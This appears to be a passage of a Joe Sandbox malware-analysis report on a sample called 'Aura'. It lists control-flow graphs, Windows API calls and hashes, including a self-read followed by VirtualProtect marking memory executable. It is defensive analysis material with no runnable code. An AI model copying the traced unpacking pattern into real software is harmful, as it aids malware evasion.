                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateErrorLastThread__dosmaperr
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2744730728-0
                                                                                                                                                                                                                                                    • Opcode ID: 107514639a18ad54954b456e5e230c1e8517e8307efcbd3ddbf77f2d47c5eaf3
                                                                                                                                                                                                                                                    • Instruction ID: c2df993514969c4e6727bf3280c583470b2fc9aa2248ca9a306e772d3cdda55b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 107514639a18ad54954b456e5e230c1e8517e8307efcbd3ddbf77f2d47c5eaf3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 23019E72505619EBDF159FA0DC06BEE3BE4FF40796F004098F80196291EBB1DE40DB60

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 232 b54ee-b54fb call bc2bb 235 b553b-b553e ExitThread 232->235 236 b54fd-b5505 232->236 236->235 237 b5507-b550b 236->237 238 b550d call bce1b 237->238 239 b5512-b5518 237->239 238->239 241 b551a-b551c 239->241 242 b5525-b552b 239->242 241->242 243 b551e-b551f CloseHandle 241->243 242->235 244 b552d-b552f 242->244 243->242 244->235 245 b5531-b5535 FreeLibraryAndExitThread 244->245 245->235
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 000BC2BB: GetLastError.KERNEL32(00000000,?,000B76E9,000BD306,?,?,000BC1B7,00000001,00000364,?,00000005,000000FF,?,000B5495,000D8E38,0000000C), ref: 000BC2BF
                                                                                                                                                                                                                                                      • Part of subcall function 000BC2BB: SetLastError.KERNEL32(00000000), ref: 000BC361
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,000B53D9,?,?,000B54CE,00000000), ref: 000B551F
                                                                                                                                                                                                                                                    • FreeLibraryAndExitThread.KERNELBASE(?,?,?,?,000B53D9,?,?,000B54CE,00000000), ref: 000B5535
                                                                                                                                                                                                                                                    • ExitThread.KERNEL32 ref: 000B553E
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorExitLastThread$CloseFreeHandleLibrary
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1991824761-0
                                                                                                                                                                                                                                                    • Opcode ID: 7c8f11d4c60a88d2126bf88ae964ca04543f700b6f9cb679e6905529dd7c13c7
                                                                                                                                                                                                                                                    • Instruction ID: c082805b01b3561dd410cc82b0dcc88b1c8814194e3a64bbb2a82dd36db371c8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7c8f11d4c60a88d2126bf88ae964ca04543f700b6f9cb679e6905529dd7c13c7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 95F03A70101E006BDB715B659C18BAA3BDAAF003B2B084694F9AA970A1DB25ED428660

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 246 b565f-b566b call b5646 249 b567d-b5689 call b55c4 ExitProcess 246->249 250 b566d-b5677 GetCurrentProcess TerminateProcess 246->250 250->249
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000002,?,000B5721,000B8396,000B8396,?,00000002,F7EDDA51,000B8396,00000002), ref: 000B5670
                                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,000B5721,000B8396,000B8396,?,00000002,F7EDDA51,000B8396,00000002), ref: 000B5677
                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 000B5689
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1703294689-0
                                                                                                                                                                                                                                                    • Opcode ID: 450a577e7d92761e64c9b183f9e201d3d0e1d98bf229792ec437f0ad65e8437c
                                                                                                                                                                                                                                                    • Instruction ID: 55ce810481fcd52e4b9af347897589a1e3c6f11d17bf288f2641b650f30dd462
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 450a577e7d92761e64c9b183f9e201d3d0e1d98bf229792ec437f0ad65e8437c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 63D09231001A08BBEF113FA1EC0EAE93F2AEF44382B444051BD494A172DF3A9D52DAA4

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 353 c3bf4-c3c16 354 c3c1c-c3c1e 353->354 355 c3e09 353->355 357 c3c4a-c3c6d 354->357 358 c3c20-c3c3f call b7f78 354->358 356 c3e0b-c3e0f 355->356 360 c3c6f-c3c71 357->360 361 c3c73-c3c79 357->361 364 c3c42-c3c45 358->364 360->361 363 c3c7b-c3c8c 360->363 361->358 361->363 365 c3c8e-c3c9c call c29a2 363->365 366 c3c9f-c3caf call c3f21 363->366 364->356 365->366 371 c3cf8-c3d0a 366->371 372 c3cb1-c3cb7 366->372 373 c3d0c-c3d12 371->373 374 c3d61-c3d81 WriteFile 371->374 375 c3cb9-c3cbc 372->375 376 c3ce0-c3cf6 call c3f9e 372->376 380 c3d4d-c3d5a call c43cd 373->380 381 c3d14-c3d17 373->381 377 c3d8c 374->377 378 c3d83-c3d89 GetLastError 374->378 382 c3cbe-c3cc1 375->382 383 c3cc7-c3cd6 call c4365 375->383 393 c3cd9-c3cdb 376->393 388 c3d8f-c3d9a 377->388 378->377 392 c3d5f 380->392 389 c3d39-c3d4b call c4591 381->389 390 c3d19-c3d1c 381->390 382->383 384 c3da1-c3da4 382->384 383->393 396 c3da7-c3da9 384->396 394 c3d9c-c3d9f 388->394 395 c3e04-c3e07 388->395 400 c3d34-c3d37 389->400 390->396 397 c3d22-c3d2f call c44a8 390->397 392->400 393->388 394->384 395->356 401 c3dab-c3db0 396->401 402 c3dd7-c3de3 396->402 397->400 400->393 406 c3dc9-c3dd2 call b7770 401->406 407 c3db2-c3dc4 401->407 404 c3ded-c3dff 402->404 405 c3de5-c3deb 402->405 404->364 405->355 405->404 406->364 407->364
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 000C3F9E: GetConsoleOutputCP.KERNEL32(F7EDDA51,00000000,00000000,?), ref: 000C4001
                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,000B8584,?), ref: 000C3D79
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,000B8584,?,000B87C8,00000000,?,00000000,000B87C8,?,?,?,000D8FE8,0000002C,000B86B4,?), ref: 000C3D83
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ConsoleErrorFileLastOutputWrite
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2915228174-0
                                                                                                                                                                                                                                                    • Opcode ID: b05b8213fb419b164412deaaa6a9a77adc415c0deb5f7eb552b85afa0ca457da
                                                                                                                                                                                                                                                    • Instruction ID: 60df9fc9597de00da6f061f40a9117f3e362ec0b33228bde39f43c8460a3e2b7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b05b8213fb419b164412deaaa6a9a77adc415c0deb5f7eb552b85afa0ca457da
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0F61BCB591411AAFDF15CFA8D884FEEBBB9BF49304F14815DE801A7252D732DA01DBA0

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 410 c43cd-c4422 call b0050 413 c4424 410->413 414 c4497-c44a7 call aa6e1 410->414 415 c442a 413->415 418 c4430-c4432 415->418 419 c444c-c4471 WriteFile 418->419 420 c4434-c4439 418->420 423 c448f-c4495 GetLastError 419->423 424 c4473-c447e 419->424 421 c443b-c4441 420->421 422 c4442-c444a 420->422 421->422 422->418 422->419 423->414 424->414 425 c4480-c448b 424->425 425->415 426 c448d 425->426 426->414
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,000C3D5F,00000000,000B87C8,?,00000000,?,00000000), ref: 000C4469
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,000C3D5F,00000000,000B87C8,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,000B8584), ref: 000C448F
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 442123175-0
                                                                                                                                                                                                                                                    • Opcode ID: fe616be72a109ebb5e8804e96eacb654239944b0625402bfc74c93773291c515
                                                                                                                                                                                                                                                    • Instruction ID: ec543ecc9799872a8181c4359a8b5760bada66fb0a320d183047c97dd25a59a6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fe616be72a109ebb5e8804e96eacb654239944b0625402bfc74c93773291c515
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5B218D35A002199BCB19CF69DC90BEEB7B9FB58305F2440AEE906D7251D630DE42CF60

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 427 a90f0-a9130 call aefc1 430 a9136-a913d 427->430 431 a91c7-a91c9 call ab317 427->431 432 a91ce-a91df call ab317 430->432 433 a9143-a9149 430->433 431->432 443 a919f-a91aa 432->443 435 a914b-a9172 call aefd2 433->435 436 a9174-a919a call aefd2 call a92f0 433->436 445 a91b6-a91c6 435->445 436->443 443->445 446 a91b1 call aa660 443->446 446->445
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 000A91C9
                                                                                                                                                                                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 000A91D7
                                                                                                                                                                                                                                                      • Part of subcall function 000AEFD2: ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,000A8E4A,000AA2F0), ref: 000AEFE7
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Cpp_errorThrow_std::_$ExclusiveLockRelease
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3666349979-0
                                                                                                                                                                                                                                                    • Opcode ID: 77a9e7e41564ea100834a5c0588255ef22a6d8bb2b633f387dc59f11a6f9222e
                                                                                                                                                                                                                                                    • Instruction ID: e6c1f7b91c39c40b88c58b5134062a65084e01e8bf4859c400fc1ac295fd6a9c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 77a9e7e41564ea100834a5c0588255ef22a6d8bb2b633f387dc59f11a6f9222e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CF21E5B1A006569BDB10DFA4CD45BAEBBB5FF06320F144228E515573C2D734A915CBD2

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 449 bda52-bda57 450 bda59-bda71 449->450 451 bda7f-bda88 450->451 452 bda73-bda77 450->452 454 bda9a 451->454 455 bda8a-bda8d 451->455 452->451 453 bda79-bda7d 452->453 457 bdaf4-bdaf8 453->457 456 bda9c-bdaa9 GetStdHandle 454->456 458 bda8f-bda94 455->458 459 bda96-bda98 455->459 460 bdaab-bdaad 456->460 461 bdad6-bdae8 456->461 457->450 462 bdafe-bdb01 457->462 458->456 459->456 460->461 463 bdaaf-bdab8 GetFileType 460->463 461->457 464 bdaea-bdaed 461->464 463->461 465 bdaba-bdac3 463->465 464->457 466 bdacb-bdace 465->466 467 bdac5-bdac9 465->467 466->457 468 bdad0-bdad4 466->468 467->457 468->457
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,000BD941,000D9330,0000000C), ref: 000BDA9E
                                                                                                                                                                                                                                                    • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,000BD941,000D9330,0000000C), ref: 000BDAB0
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FileHandleType
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3000768030-0
                                                                                                                                                                                                                                                    • Opcode ID: 2c85b9383ba2aca11db53dfc5d5ea10f3154de2e36c2409bd3a3c9c270a0ad98
                                                                                                                                                                                                                                                    • Instruction ID: 0a960db4d7e50adb4f33be11d2cee80e60cc421b2bfa46e29c39c2d6c9bfdfcc
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2c85b9383ba2aca11db53dfc5d5ea10f3154de2e36c2409bd3a3c9c270a0ad98
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A11D67110C7424AD7308F3E8CD86A6FAD9AB56330B38075BD4B6C65F1E674D886D212

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 469 a1ef0-a1f7c call a1240 FreeConsole call a14b0 * 2 call a1240 VirtualProtect 479 a1f99-a1fab call aa6e1 469->479 480 a1f7e-a1f95 469->480 480->479
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 000A1240: _strlen.LIBCMT ref: 000A12BA
                                                                                                                                                                                                                                                    • FreeConsole.KERNELBASE(?,?,?,?,?,000A173F,?,?,?,00000000,?), ref: 000A1F21
                                                                                                                                                                                                                                                    • VirtualProtect.KERNELBASE(000DA011,00000549,00000040,?), ref: 000A1F78
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ConsoleFreeProtectVirtual_strlen
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1248733679-0
                                                                                                                                                                                                                                                    • Opcode ID: dfafe4e5f642fac3138198f2efd41582c2d3c7dc7ca76b1ba086b095f29f45be
                                                                                                                                                                                                                                                    • Instruction ID: 5d550a360dd35e1ebc6c1974007fd29aff9cfb01c8fcabb7cde4ad18079a6859
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dfafe4e5f642fac3138198f2efd41582c2d3c7dc7ca76b1ba086b095f29f45be
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F511CA75B002056BEB04BBA4DC02FFE7B74DB46701F04443AFA04AB2C3E675955087E5
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(000D8E38,0000000C), ref: 000B5483
                                                                                                                                                                                                                                                    • ExitThread.KERNEL32 ref: 000B548A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorExitLastThread
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1611280651-0
                                                                                                                                                                                                                                                    • Opcode ID: 0d5a9cf62b5deb0f2112de85739da855064da696a6ec311cccaf7433434e726f
                                                                                                                                                                                                                                                    • Instruction ID: 7e6aa9e7c962c7a6d2d425c19c8fc62cfb426417a103c833d8b7c3fbc96a8a61
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0d5a9cf62b5deb0f2112de85739da855064da696a6ec311cccaf7433434e726f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FEF0AF71A01605AFEB00AFB0CC0AAEE7B74EF00701F14849AF4019B293CF795941CF61
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(00000000), ref: 000A2288
                                                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 000A229C
                                                                                                                                                                                                                                                      • Part of subcall function 000A1FB0: CreateFileA.KERNELBASE ref: 000A2036
                                                                                                                                                                                                                                                      • Part of subcall function 000A1FB0: GetFileSize.KERNEL32(00000000,00000000), ref: 000A2046
                                                                                                                                                                                                                                                      • Part of subcall function 000A1FB0: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 000A206B
                                                                                                                                                                                                                                                      • Part of subcall function 000A1FB0: CloseHandle.KERNELBASE(00000000), ref: 000A207A
                                                                                                                                                                                                                                                      • Part of subcall function 000A1FB0: _strlen.LIBCMT ref: 000A20CD
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$HandleModule$CloseCreateNameReadSize_strlen
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3505371420-0
                                                                                                                                                                                                                                                    • Opcode ID: f5ce391f9690868d1eeed799b6d6866fb58239c8e0eac4742f63ae3e5276b9f0
                                                                                                                                                                                                                                                    • Instruction ID: a3a903cc7e9142e933c92ccd3402faf6e9f5e6144c95af443fb0d7090d2f9465
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f5ce391f9690868d1eeed799b6d6866fb58239c8e0eac4742f63ae3e5276b9f0
